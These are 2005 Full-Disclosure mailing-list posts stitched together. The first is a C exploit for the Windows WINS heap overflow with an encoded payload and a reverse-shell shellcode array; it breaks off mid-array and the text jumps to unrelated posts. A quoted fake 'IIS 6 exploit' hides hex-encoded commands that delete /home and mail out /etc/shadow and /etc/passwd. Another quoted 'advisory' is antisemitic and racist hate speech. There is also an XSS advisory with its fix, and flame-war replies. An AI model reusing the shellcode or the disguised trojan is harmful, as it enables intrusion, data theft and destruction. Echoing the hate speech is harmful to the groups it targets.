  Nicolas Waisman of Immunity Inc. (www.immunitysec.com)

Advisory link:


  immunitysec.com/downloads/instantanea.pdf

Fix:


  support.microsoft.com/kb/870763 (MS04-045)

Exploit method:


  PEB (RtlEnterCriticalSection)

Tested Working:


  Win2k SP4  Server ENGLISH (should be all langages, not sure)
  Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
   (KB870763 removed!)

Note:


  A HAT-SQUAD view on this hole; exploitable and remaining critic for
Windows 2000.
  May need update for Windows 2003 due to the different
  structure of wins.exe in it but the bug remain exploitable
  with no KB870763 of course
  If you look closely at my code , you will notice two overwrites,
  this is the difference between Server <=> Advanced Server, with an
  el8 pad, repair, you catch them both.

Greetings:


  All guys at hat-squad and metasploit
  also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
  and thanx you leku.


  -=[®class101.org]=-

*/

#include 
#include 
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#endif

char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";


char scode2[]=
/*original vlad902's reverse shellcode from metasploit.com
  NOT xored, modded by class101 for ca's xpl0it to remove the common badchar
"\x20"
  original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
"\xFC\x6A\xEB\x52" /*modded adjusting jump*/
"\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
"\x78\x01\xEF"
"\x83\xC7\x01" /*modded, adding 1 to edi*/
"\x8B\x4F\x17" /*modded, adjusting ecx*/
"\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
"\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
"\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
"\x8B\x5F\x23" /*modded, adjusting ebx*/
"\x01\xEB\x66\x8B\x0C\x4B"
"\x8B\x5F\x1B" /*modded, adjusting ebx*/
"\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
"\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
"\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
"\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
"\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
"\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
"\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
"\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
"\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
"\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
"\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
"\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
"\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
"\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";

char bug[]=
"\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9

[Full-disclosure] BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow

2005-04-04 Thread [EMAIL PROTECTED]
Last Recall of a NetVault vulnerability still unpatched

http://class101.org/netv-remhbof.pdf

-
class101
Jr. Researcher
Hat-Squad.com
-



Re: [Full-disclosure] Microsoft Windows Internet Name Service (WINS)Remote Heap Overflow Exploit

2005-04-04 Thread [EMAIL PROTECTED]
fixed a code error in v0.2 , sorry for the access violation :)


-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]>
To: "Full-Disclosure" ;
<[EMAIL PROTECTED]>; ; <[EMAIL PROTECTED]>
Sent: Monday, April 04, 2005 3:05 PM
Subject: [Full-disclosure] Microsoft Windows Internet Name Service
(WINS)Remote Heap Overflow Exploit



Re: [Full-disclosure] Re: Case ID 51560370 - Notice ofClaimedInfringement

2005-04-08 Thread [EMAIL PROTECTED]
It would be nice to take your crap discussion elsewhere; to start with, this
thread shouldn't be here, thx Mr Coombs ..



-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "AJ C" <[EMAIL PROTECTED]>
To: "Jason" <[EMAIL PROTECTED]>; 
Sent: Friday, April 08, 2005 4:48 AM
Subject: Re: [Full-disclosure] Re: Case ID 51560370 - Notice
ofClaimedInfringement


> Civil vs Criminal cases dude, you're imposing some aspects of criminal
> cases upon civil proceedings and that's not how they work.  In a
> criminal trial it's a dramatized version of reasonable doubt, civil
> proceedings must show 51%+ responsibility on the part of the defendant
> (much, much easier and why the powers that be choose this route).  Not
> to mention it's their content (no harm, no foul on downloading
> something they already own) and MPAA/RIAA/blah have set precedence for
> proactively tracking (either themselves or appointed parties)
> file-sharing events (method of access is not unlawful and cannot be
> brought into contention...is BitTorrent inherently illegal when used
> for legit purposes? -- nope).
>
> If bb knocks on your door then you argue evidentiary process otherwise
> in a civil proceeding you bear more of a burden to show you *didn't*
> do what they're claiming (right or wrong they do have the legal upper
> hand with their records versus essentially a verbal denial at best).
>
> 'Probably just easier to not download the crap and stay off the radar,
$0.02.
>
> On Apr 7, 2005 7:26 PM, Jason <[EMAIL PROTECTED]> wrote:
> > IANAL but it seems this thought process is broken.
> >
> > Jason Coombs wrote:
> > > Come on, people, get a clue.
> > >
> > > The copyright owner has authorized the forensic investigators to
> > > download the infringing material. If it was there, according to a
> > > forensic investigator, then you have to prove it was not.
> >
> > This position does not hold water, there is no way for them to not break
> > the same laws they would be attempting to enforce by performing the
> > investigation from a remote location and without a valid search warrant.
> > You do not have to prove that you did not have the content, you only
> > have to prove that you have content that appears very similar to the
> > remote reviewer.
> >
> > If you were to place a copyrighted work of your own there then would
> > they be forced to download it and break the law in order to prove that
> > it was not the other copyright owners property? If they show in the logs
> > as having attempted a download does this make them guilty?
> >
> > It is as simple as creating a server that will return filenames and
> > hashes found on the network but actually provide /dev/random for the
> > download or your copyrighted content with an engineered hash collision.
> >
> > It only takes one case to prevent the civil suit from being filed. To
> > file the suit would be admitting to having broken the law. You cannot
> > bring suit when the basis of the suit is itself illegal activity.
> >
>
>
> --
> AJC
> [EMAIL PROTECTED]



Re: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!

2005-04-13 Thread [EMAIL PROTECTED]
to post this 1 time is enough,

http://lists.grok.org.uk/full-disclosure-charter.html

read it so abusively ...





-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message - 
From: <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, April 13, 2005 9:36 AM
Subject: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!


>   / / / / / / / / / / /
>   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\
>  \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\
>/ / / / / / / / / / /
> 
> 
>   " t h e   p i c t u r e   h a s   b e e n   p r i n t e d ! "
> 
> 
>  http://www.hackphreak.org
>  http://bantown.4t.com
>  http://alexis.perl-dev.net
> 
>   | Version   : Hackphreak advisory #3 of many
>   | Author: darkn3ss @#hackphreak @#perldev @#bantown
>   | Contact   : darkn3ss at perl-dev.net
>   | Contributed   : All of Team Hackphreak AND BANTOWN
>   | Topic : RACE CONDITION VULN. IN JEWS,NIGGERS & OTHER
>   | Effected  : All Operating Systems which use NaziBSD
>   | Released  : April 12th, 2005
>   | Credits   : bantown.4t.com, alexis.perl-dev.net,
> www.hackphreak.org
>   | Vender status : OVEN BAKED
> 
> 
> 
>   / / / / / / / / / / /
>   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\
>  \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\   \/\
>/ / / / / / / / / / /
> 
> 
>   [ SHOUTS ]
> 
>   alexis   - I cant kill jews without you!
>   kelly- Lol, I know youre fat, and MEXICAN, but whats a nazi
>  gonna do?
> 
>   werd to all my nazi south siderz! wootwoot u know who u r.
>   also check out my siq ass tatts.
> http://darkn3ss.evilmag.com/images/pics/
> 
>   http://darkn3ss.evilmag.com/images/pics/
>   http://darkn3ss.evilmag.com/images/pics/
>   http://darkn3ss.evilmag.com/images/pics/
>   http://darkn3ss.evilmag.com/images/pics/
> 
>   Ok werd, a special shoutz out go to struct for being a f4gg0t and
> trying
>   to bust out a power move to take over bantown.
> 
>   LL
> 
>    _   _   _   _   _ ____ _
>  / ___|_   _|  _ \| | | |/ ___|_   _| |  ___/ \  |_ _| |   
>  \___ \ | | | |_) | | | | | | |   | |_ / _ \  | || |   
>   ___) || | |  _ <| |_| | |___  | |   |  _/ ___ \ | || |___
>  |/ |_| |_| \_\\___/ \| |_|   |_|/_/   \_\___|_|
> 
>  OH I ALMOST FORGOT
> 
>  THANKS GOES OUT TO RLOXLEY AND THE WHOLE #HACKPHREAK UNDERNET CREW
>  FOR SUPPORTING MY CLUCKING STUPID ASZS AND KICKING DOWN THE MONEY
>  TO GET ALL MY SWEET NAZI TATS AND MY AWESOME BSD DEVIL TAT!!
> 
>  [ PROFILE ]
> 
>  name   : darkn3ss
>  email  : darkn3ss at perl-dev.net
>  aliases name   : kike killer, moron, SS South Sider
>  IRC: us.undernet.org @#hackphreak @#perldev @#bantown
>  favorite quote : the picture has been printed!
>  hobbies: killing jews, crying on irc.
> 
>  * X (cservice at undernet.org) has left #perldev (At the request 
> of
> perlcode)
>   i think this channel is going to be closed tommarow.
>   why?
>   i dont want to be here anymore.
>   too much crap going on.
>   understandable
>   it hurts me to see that picture
>   I know
>   I'm sorry
>   I tried to talk sense
>   i feel like i did something wrong
>   it's like talking to a wall
>   i gotta go
>   u didn't do anything wrong
>   oh shit
>   he's crying
>   brb
>   :/
>   dude!
>  * Looking up RLoxley user info...
>  * lothos hugs darkn3ss
> 
>  LOL THIS IS MY FAT GIRLFRIEND, SHES MAXICAN
> 
> 15:31 < dancerkel> DARKN3SS HAS A TINY CaULK
> 15:32 < dancerkel> WHEN WE F-WORD HE DUCT TAPES A HOT DOG TO IT
> FIRST SO I
>CAN TELL WHEN ITS IN
> 
> 
>  ALSO, PLEASE GO AHEAD AND DOWNLOAD MY AWESOME IRC BOT CODE
>  AquaCrystal - "a powerful pure perl derived irc channel bot"
>  http://www.perl-dev.net/projects/darkn3ss/aquacrystal-2.1.tar.gz
> 
> [ BACKGROUND ]
> 
> Basically, its clear that the aryan race is superior and not
> vulnerable to
> "conditions".  It IS ironic that i have a fat mexican girlfriend,
> but lets put
> that to the side for now.  In this release I plan on showing how to
> exploit
> these race conditions.
> 
> [ PROBLEM DESCRPTION ]
> 
> Specific race conditions exist for each of the u

[Full-disclosure] BakBone NetVault 6.x/7.x multiples vulnerabilities + exploit

2005-04-13 Thread [EMAIL PROTECTED]
As a reminder, one month ago the Hat-Squad found 2 security holes
affecting BakBone NetVault, all versions.
And as far as I know (sorry if I missed the hotfix), there is still no patch
available.
We will re-publish this warning each month as long as there is no fix.
Some temporary countermeasures are available in both *.pdf files.

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow advisory

class101.org/netv-remhbof.pdf

BakBone NetVault 6.x/7.x Remote Heap Buffer Overflow exploit

class101.org/36/55/op.php

BakBone NetVault 6.x/7.x Local Stack Buffer Overflow advisory

class101.org/netv-locsbof.pdf

BakBone NetVault 6.x/7.x Local Stack Buffer Overflow exploit

class101.org/36/55/op.php


-
class101
Jr. Researcher
Hat-Squad.com
-



Re: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!

2005-04-13 Thread [EMAIL PROTECTED]
> This reminds me of why I tend to stay away from FD.

which is that you have nothing decent to say on security, to post on FD.
babye :)

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "vulcanius" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, April 13, 2005 8:44 PM
Subject: Re: [Full-disclosure] #HACKPHREAK ADVISORY | BBQ CHICKEN WTF!


Agreed.

But I do have to say, all the tribal tattoos are very original. I've
never seen those before. *note: sarcasm*

This reminds me of why I tend to stay away from FD.

Vulcanius

On 4/13/05, Berend-Jan Wever <[EMAIL PROTECTED]> wrote:
> I propose we up the age limit to post on full-disclosure to 14.
>
> Cheers,
> SkyLined
>



[Full-disclosure] XSS bug in JAWS gadget Glossary (0.4-latestbeta (beta 2))

2005-04-18 Thread [EMAIL PROTECTED]
Small XSS Bug in JAWS gadget: Glossary all versions vulnerable 0.3 - 0.5 
latest beta (beta2)

STATUS: The vendor has been contacted and they fixed the bug, but they
haven't released an official patch yet.
(You can find a provisional patch at the end of this message.)

TECHNICAL INFO

The Glossary gadget doesn't filter dangerous characters in the process of
adding a new word to the glossary, allowing the insertion of items
from "alert(document.cookie)" to more complex code.
Furthermore, this permits the theft of cookies and escalation of
permissions (in the case where someone with lower access than you
inserts malicious code and tries to steal your access).

VULNERABLE VERSIONS
--
0.4-LATEST BETA (2)

FIX
--
Replace the NewTerm function in GlossaryModel.php
with this new one.
/**
 * Adds a new term
 *
 * @access  public
 * @param   string  $term Term
 * @param   string  $desc Term's description
 * @return  boolean Returns true if term was added
 */
function NewTerm ($term, $desc)
{
    // XSS fix: strip HTML tags from the user-supplied term and description
    // before they are stored (input-side filtering only; output is not
    // re-encoded by this function)
    if (stristr($term, "<") || stristr($term, ">"))
        $term = strip_tags($term);
    if (stristr($desc, "<") || stristr($desc, ">"))
        $desc = strip_tags($desc);

    // values are passed as bound parameters, not concatenated into the SQL
    $sql = "INSERT INTO [[term]] (term, description, createtime, updatetime)
            VALUES ({term},{desc},NOW(),NOW())";
    $rs = $GLOBALS["app"]->DB->Execute ($sql, array ("term" => $term,
                                                     "desc" => $desc));

    if ($rs) {
        $GLOBALS["session"]->PushLastResponse (_t("GLOSSARY_TERM_ADDED"),
                                               RESPONSE_NOTICE);
        return true;
    } else {
        $GLOBALS["session"]->PushLastResponse (_t("GLOSSARY_ERROR_TERM_NOT_CREATED"),
                                               RESPONSE_ERROR);
        return new JawsError (_t("GLOSSARY_ERROR_TERM_NOT_CREATED"),
                              _t("GLOSSARY_NAME"));
    }
}
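As an added example (not the JAWS project's code and not part of the advisory), the patch's input-side strip_tags() step is shown beside output-side HTML encoding, which also protects glossary rows that were stored before the fix was applied; the function names sanitize_on_input and render_term are assumed, and the input is constructed from the payload shape the advisory names.

```php
<?php
// Added example: input filtering as in the posted patch, plus output
// encoding at render time as a second, independent layer.

/** Mirrors the posted fix: tags are stripped only when angle brackets appear. */
function sanitize_on_input(string $value): string
{
    if (stristr($value, '<') || stristr($value, '>')) {
        $value = strip_tags($value);
    }
    return $value;
}

/**
 * Renders one glossary entry. Every stored value is HTML-encoded here,
 * so a value that reached the database unfiltered is still shown as text.
 */
function render_term(string $term, string $desc): string
{
    $t = htmlspecialchars($term, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $d = htmlspecialchars($desc, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<dt>$t</dt><dd>$d</dd>";
}

// Constructed input: a description carrying the script payload from the advisory.
$term = 'Cookie';
$desc = '<script>alert(document.cookie)</script>';

// Path 1: new entry goes through the patched NewTerm-style filter first.
$stored = sanitize_on_input($desc);
echo render_term($term, $stored), PHP_EOL;

// Path 2: an entry created before the patch was stored unfiltered;
// output encoding alone keeps it inert in the page.
echo render_term($term, $desc), PHP_EOL;
```

Running the script shows the first entry with the tags removed and the second with the tags encoded as entities, so neither is interpreted as markup by the browser.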

--
Contact information
:Paulino Calderon
:[EMAIL PROTECTED]
:http://suckea.com/nah/


Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

2005-04-20 Thread [EMAIL PROTECTED]
perfect asshole

-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
From: "Day Jay" <[EMAIL PROTECTED]>
To: 
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow
Exploit(was broken)


> Sorry, the previous code was broken. This code should
> work...
>
> Happy Owning!! :)
>
>
> =SNIP
> /* Proof of concept code
> Please don't send us e-mails
> asking us "how to hack" because
> we will be forced to skullfsck you.
>
>  DISCLAIMER:
>  !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
>
> IIS 6 Buffer Overflow Exploit
>
> BUG: inetinfo.exe improperly bound checks
> http requests sent longer than 6998 chars.
> Can get messy but enough testing, and we have
> found a way in.
>
> VENDOR STATUS: Notified
> FIX: In process
>
> Remote root.
>
> eg.
> #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>  + Connecting to host...
>  + Connected.
>  + Inserting Shellcode...
>  + Done...
>  + Spawining shell..
>
>  Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> C:\
>
>
>
>  */
>  char shellcode[] =
>  "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
>  "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
>  "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
>  "\x72\x3b\x65\x63\x68\x6f\x20\x62"
>  "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
>  "\x68\x65\x68\x65";
>
>  char launcher [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
>  "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>  char netcat_shell [] =
>  "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
>  "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
>  "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
>  "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
>  "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
>  "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
>
>
>  main()
>  {
>
>  file://Section Initialises designs implemented by mexicans
>  file://Imigrate
>  system(launcher);
>  system(netcat_shell);
>  system(shellcode);
>
>  file://int socket = 0;
>  file://double long port = 0.0;
>
>  file://#DEFINE port host address
>  file://#DEFINE number of inters
>  file://#DEFINE gull eeuEE
>
>   // for(int j; j < 30; j++)
>  {
>  file://Find socket remote address fault
>  printf(".");
>  }
>  file://overtake inetinfo here IIS_66^
>  return 0;
>  }
>
> __
> Do You Yahoo!?
> Tired of spam?  Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com



Re: [Full-disclosure] Possible Virus activity

2005-04-23 Thread [EMAIL PROTECTED]
another kiddie flaming his next, what should we care about what you think
about AOL? shut the fuck up and grow up, kid.


-
class101
Jr. Researcher
Hat-Squad.com
-
- Original Message -
> I'm sorry but if you are coding 0days, testing vulns and such and you do
> this all through AOL? Muhahahahah! And I'm sure you are making all sorts
> of TCP connections OUTSIDE the AOL client right?
>
> And asinine was spelled correctly =]
>





Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft

2005-04-27 Thread [EMAIL PROTECTED]
They published their contact address some days ago: [EMAIL PROTECTED]

Gary O'leary-Steele wrote:
Hi,
I'm also trying to report a vulnerability to Microsoft, but the site they
provide is broken. When I fill out and send
https://www.microsoft.com/technet/security/bulletin/alertus.aspx
I get:
We're sorry, but we were unable to service your request. You may wish to
choose from the links below for information about Microsoft products and
services.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Kevin
Sent: 27 April 2005 00:11
To: Microsoft Security Response Center
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] How to Report a Security Vulnerability
to Microsoft
On a related note, today we ran into (headfirst) a bug in Internet
Explorer with the processing of AutoProxy scripts (Proxy Automatic
Configuration, aka "PAC", a specialized subset of JavaScript used to make
client-side web proxy routing decisions).
Eventually I isolated the problem to a broken implementation of
dnsDomainIs() in Internet Explorer, so I decided to do the right thing
and report the bug to Microsoft.  This isn't a highly critical security
flaw, so I hunted around microsoft.com and eventually found the page
on bug reporting:  http://support.microsoft.com/gp/contactbug
The page states "If you think you have found a bug in a Microsoft
product, contact our Microsoft Product Support Services department.
(800) MICROSOFT (642-7676)".  No email address, no web form, just a
phone number.
So I call this number, and after five minutes of sitting through IVR
menus, I finally reach a live human.  She asks for my name and phone
number, and as soon as I mention that I am reporting a bug in Internet
Explorer, says she will transfer my call.
At that point I get fifteen seconds of music on hold, followed by dead
air.  That was a half hour ago.
Kevin Kadow
(P.S. Yes, this is definitely a bug in MSIE -- every other browser
I've tried handles dnsDomainIs() correctly, the sole exception is
MSIE).
 



Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft

2005-04-28 Thread [EMAIL PROTECTED]
Who has access to error report data

Microsoft employees, contractors and vendors who have a business need
to use the error report data are provided access. If the error report
indicates that a third-party product is involved, Microsoft may send
the data to the vendor of that product, who may in turn send the data
to sub-vendors and partners.

http://oca.microsoft.com/en/dcp20.asp

Tatercrispies wrote:

> What do you want confirmation about? It's not a big secret when the
> big-assed dialog box pops up and asks if you'd like to submit
> crash data to Microsoft's servers. (sorry, M$'$ $ervers)
>
> https://winqual.microsoft.com/help/wer_help/dev.aspx
>
>
> On 4/28/05, Georgi Guninski <[EMAIL PROTECTED]> wrote:
>
>> i would like m$ to officially confirm they are collecting crashes
>> and confidential information from third parties warez.
>>
>> because i am sure my humble application c:\fsckb11.EXE does not
>> send crash reports to m$ in the cases when it crashes.
>>
>>
>


